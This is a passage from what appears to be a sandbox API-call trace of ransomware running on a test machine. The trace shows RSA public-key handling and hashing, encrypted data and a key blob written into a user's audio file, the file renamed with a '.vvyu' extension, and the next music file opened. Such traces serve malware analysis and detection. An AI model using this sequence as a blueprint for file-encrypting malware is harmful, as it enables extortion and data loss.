KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.880] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.880] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.881] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.881] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.882] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.882] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.882] GetLastError () returned 0x0 [0189.882] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.882] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.882] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.882] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.882] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x145e0) returned 0x2d45778 [0189.883] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39408 [0189.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a18 [0189.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39450 [0189.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a30 [0189.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a60 [0189.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ac0 [0189.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a78 [0189.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.884] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0189.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ac0 [0189.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0189.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a78 [0189.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39a60 [0189.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0189.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0189.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0189.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0189.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.888] GetCurrentThreadId () returned 0x264 [0189.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44090 [0189.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0189.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.889] GetCurrentThreadId () returned 0x264 [0189.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0189.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c829b0 [0189.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0189.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ac0 [0189.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a60 [0189.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0189.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a78 [0189.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a48 [0189.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ad8 [0189.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0189.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39aa8 [0189.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a90 [0189.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39af0 [0189.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0189.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a90 [0189.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0189.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0189.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0189.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a60 [0189.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0189.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0189.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0189.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0189.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0189.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0189.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39450 | out: hHeap=0x6a0000) returned 1 [0189.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0189.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.901] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x145d6, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x145d6, lpOverlapped=0x0) returned 1 [0189.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0189.905] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x145db, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.905] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd28 [0189.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd28 | out: hHeap=0x6a0000) returned 1 [0189.907] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.907] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.907] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.907] CloseHandle (hObject=0x584) returned 1 [0189.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0189.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0189.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0189.910] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\LNo4VDj5U-Z.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\lno4vdj5u-z.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\LNo4VDj5U-Z.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\lno4vdj5u-z.wav.vvyu")) returned 1 [0189.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.912] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x723d10 | out: hHeap=0x6a0000) returned 1 [0189.914] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97648be0, ftCreationTime.dwHighDateTime=0x1d8a1f8, ftLastAccessTime.dwLowDateTime=0xf27823d0, ftLastAccessTime.dwHighDateTime=0x1d8a5d0, ftLastWriteTime.dwLowDateTime=0xf27823d0, ftLastWriteTime.dwHighDateTime=0x1d8a5d0, nFileSizeHigh=0x0, nFileSizeLow=0xdd20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Nfk529nzfIj1e1.mp3", cAlternateFileName="NFK529~1.MP3")) returned 1 [0189.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0189.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0189.915] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\Nfk529nzfIj1e1.mp3") returned=".mp3" [0189.915] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\Nfk529nzfIj1e1.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\nfk529nzfij1e1.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 